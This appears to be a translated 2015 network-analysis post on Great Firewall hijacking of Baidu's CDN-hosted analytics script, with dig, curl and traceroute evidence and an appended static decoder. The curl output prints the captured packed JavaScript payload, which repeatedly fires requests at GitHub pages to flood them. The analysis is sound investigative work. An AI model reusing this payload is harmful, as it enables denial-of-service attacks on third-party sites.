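My conclusion first. Based on the analysis, I strongly suspect that what the GFW hijacked this time is the connection from Baidu's overseas CDN back to China, not the connection between users and the CDN directly. Poisoning the CDN directly is far nastier and far stealthier than hijacking user connections.
I am in Shenzhen, Guangdong, using a VPN from a certain JS, hosted at peer1, as the exit. The VPN interface is tun0. 8.8.8.0/24 is already routed through the VPN by default.
The test URL is http://dup.baidustatic.com/tpl/ac.js.
Baidu Tongji overseas CDN resolution: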
[siyanmao@siyanmao-k29 ~]$ dig dup.baidustatic.com @8.8.8.8
; <<>> DiG 9.9.2-P2 <<>> dup.baidustatic.com @8.8.8.8
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51040
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;dup.baidustatic.com. IN A
;; ANSWER SECTION:
dup.baidustatic.com. 2938 IN CNAME ecomcbjs.jomodns.com.
ecomcbjs.jomodns.com. 59 IN CNAME ecomcbjs.wshifen.com.
ecomcbjs.wshifen.com. 299 IN A 180.76.3.138
;; Query time: 531 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Sat Apr 4 13:07:22 2015
;; MSG SIZE rcvd: 126
Baidu Tongji domestic CDN address resolution:
[siyanmao@siyanmao-k29 ~]$ dig dup.baidustatic.com @114.114.114.114
; <<>> DiG 9.9.2-P2 <<>> dup.baidustatic.com @114.114.114.114
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22259
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;dup.baidustatic.com. IN A
;; ANSWER SECTION:
dup.baidustatic.com. 5030 IN CNAME ecomcbjs.jomodns.com.
ecomcbjs.jomodns.com. 30 IN A 58.215.123.49
;; Query time: 25 msec
;; SERVER: 114.114.114.114#53(114.114.114.114)
;; WHEN: Sat Apr 4 13:10:10 2015
;; MSG SIZE rcvd: 95
Requesting the domestic address from inside China: tried several times, no hijacking observed.
root@Cat_FireWall:~# curl --interface pppoe-pppoe_tel http://58.215.123.49/tpl/ac.js | grep github
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 167 100 167 0 0 3036 0 --:--:-- --:--:-- --:--:-- 3092
Requesting the overseas address from inside China: hijacking observed.
root@Cat_FireWall:~# curl --interface pppoe-pppoe_tel http://180.76.3.138/tpl/ac.js | grep github
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1130 100 1130 0 0 2457 0 --:--:-- --:--:-- --:--:-- 2456
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))
Requesting the domestic address from overseas: tried several times, no hijacking observed.
root@Cat_FireWall:~# curl --interface tun0 http://58.215.123.49/tpl/ac.js | grep github
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 167 100 167 0 0 243 0 --:--:-- --:--:-- --:--:-- 243
Requesting the overseas address from overseas: hijacking observed.
root@Cat_FireWall:~# curl --interface tun0 http://180.76.3.138/tpl/ac.js | grep github
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1130 100 1130 0 0 1635 0 --:--:-- --:--:-- --:--:-- 1635
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))
Traceroute results attached:
Domestic to domestic:
root@Cat_FireWall:~# traceroute -n -w 1 -i pppoe-pppoe_tel 58.215.123.49
traceroute to 58.215.123.49 (58.215.123.49), 30 hops max, 38 byte packets
1 ------------- 3.759 ms 2.109 ms 2.328 ms
2 ------------- 8.620 ms 1.946 ms 17.896 ms
3 58.60.24.33 2.590 ms 2.333 ms 2.451 ms
4 183.56.66.2 3.262 ms 3.915 ms 183.56.65.86 3.690 ms
5 202.97.47.165 26.488 ms 23.881 ms 28.291 ms
6 61.160.130.50 25.855 ms 26.168 ms 24.748 ms
7 * * *
8 * * *
9 * * *
10 * * *
11 * * *
12 * * *
13 * * *
14 * * *
15 * * *
16 * *^C
Domestic to overseas:
root@Cat_FireWall:~# traceroute -n -w 1 -i pppoe-pppoe_tel 180.76.3.138
traceroute to 180.76.3.138 (180.76.3.138), 30 hops max, 38 byte packets
1 ------------- 3.451 ms 2.017 ms 2.162 ms
2 ------------- 1.919 ms 3.072 ms 1.432 ms
3 119.145.220.82 2.140 ms 2.300 ms 2.317 ms
4 183.56.65.78 10.582 ms 1.811 ms 183.56.65.74 2.364 ms
5 202.97.64.14 6.494 ms 202.97.64.90 6.247 ms 202.97.64.10 7.423 ms
6 202.97.33.214 9.657 ms 7.747 ms 202.97.33.202 4.956 ms
7 202.97.61.234 9.073 ms 7.286 ms 7.871 ms
8 202.97.60.214 161.911 ms 164.494 ms 165.175 ms
9 129.250.6.96 178.692 ms 173.779 ms 129.250.6.200 173.363 ms
10 129.250.3.89 225.555 ms 129.250.2.121 224.995 ms 129.250.3.89 224.500 ms
11 129.250.6.125 232.907 ms 129.250.6.115 241.194 ms 129.250.6.125 232.442 ms
12 129.250.3.11 213.466 ms 203.131.246.146 209.703 ms 129.250.3.11 213.506 ms
13 203.131.246.146 207.230 ms 211.049 ms 212.382 ms
14 * * *
15 * * *
16 * * *
17 * * *
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 *^C
Overseas to domestic:
root@Cat_FireWall:~# traceroute -n -w 1 -i tun0 58.215.123.49
traceroute to 58.215.123.49 (58.215.123.49), 30 hops max, 38 byte packets
1 -------------- 195.947 ms 197.496 ms 197.131 ms
2 * * *
3 216.187.88.137 198.443 ms 196.670 ms 216.187.88.37 196.077 ms
4 4.53.230.5 218.506 ms 77.67.70.205 196.052 ms 201.644 ms
5 4.53.230.5 205.076 ms 218.30.53.33 197.377 ms 4.53.230.5 231.133 ms
6 4.69.152.17 210.480 ms 205.735 ms *
7 4.53.210.114 205.601 ms 4.53.210.110 204.958 ms 202.97.50.1 335.257 ms
8 202.97.49.21 208.979 ms 202.97.35.105 363.427 ms 392.479 ms
9 202.97.49.21 207.914 ms 202.97.33.29 343.229 ms 202.97.49.21 207.652 ms
10 202.97.50.109 370.422 ms 202.97.35.105 373.707 ms 202.97.50.109 370.264 ms
11 202.97.33.29 348.333 ms 347.784 ms *
12 202.97.39.94 350.945 ms 58.215.128.78 356.080 ms *
13 202.97.39.94 349.851 ms * 352.852 ms
14 202.102.19.146 382.604 ms * *
15 * * *
16 * * *
17 * * *
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26^C
Overseas to overseas:
root@Cat_FireWall:~# traceroute -n -w 1 -i tun0 180.76.3.138
traceroute to 180.76.3.138 (180.76.3.138), 30 hops max, 38 byte packets
1 ------------- 183.651 ms 184.821 ms 184.487 ms
2 * * *
3 216.187.88.37 183.902 ms * 216.187.88.137 185.452 ms
4 216.187.88.61 185.633 ms 216.187.124.120 186.372 ms 206.72.210.114 186.115 ms
5 216.187.88.57 188.105 ms 118.143.224.1 414.602 ms 216.187.124.120 185.231 ms
6 118.143.224.9 419.347 ms 118.143.238.20 421.086 ms 118.143.224.9 421.095 ms
7 218.189.31.102 422.702 ms 118.143.224.25 429.397 ms 118.143.238.20 415.053 ms
8 * 218.189.5.20 419.124 ms 218.189.31.102 416.379 ms
9 * * *
10 * * *
11 * * *
12 * * *
13 * * *
14 * * *
15 * * *
16 * * *
17 * * *
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * *^C
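The injected response in the post is wrapped in the `eval(function(p,a,c,k,e,r)...)` packer, so reading it safely means decoding it without running it. The following is an added example, not part of the original post: a static decoder for that wrapper. `SAMPLE` is constructed from the first statement of the payload and the dictionary shown above, with the decoder body omitted; the function names are my own, and the unescape step assumes the packed strings only use `\'` and `\\`.

```javascript
// Statically decode a "p,a,c,k,e,r" wrapper: no eval(), nothing is executed.
const PACKED_RE =
  /\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;

// Same base-`radix` token encoding as the packer's own e(c) helper.
function encodeIndex(n, radix) {
  const head = n < radix ? '' : encodeIndex(Math.floor(n / radix), radix);
  const d = n % radix;
  return head + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

// Returns the decoded script text, or null when the input is not packed.
function unpack(source) {
  const m = PACKED_RE.exec(source);
  if (!m) return null;
  // Assumption: only \' and \\ escapes occur inside the packed literals.
  const unescapeLiteral = s => s.replace(/\\(.)/g, '$1');
  const payload = unescapeLiteral(m[1]);
  const radix = Number(m[2]);
  const count = Number(m[3]);
  const words = unescapeLiteral(m[4]).split('|');
  if (words.length !== count) throw new Error('dictionary size mismatch');
  const table = new Map();
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, radix);
    table.set(token, words[i] || token); // empty entry: token stands for itself
  }
  return payload.replace(/\b\w+\b/g, t => (table.has(t) ? table.get(t) : t));
}

// Hosts referenced by the decoded script, for triage.
function referencedHosts(code) {
  const hosts = new Set();
  for (const m of code.matchAll(/https?:\/\/([\w.-]+)/g)) hosts.add(m[1]);
  return [...hosts];
}

// Constructed sample: first payload statement + dictionary from the post.
const SAMPLE =
  String.raw`eval(function(p,a,c,k,e,r){/* decoder body omitted */}(` +
  String.raw`'l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");',62,64,` +
  String.raw`'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))`;

console.log(unpack(SAMPLE));
```

Feeding the full body returned by the `curl` commands above to `unpack` decodes the whole script the same way.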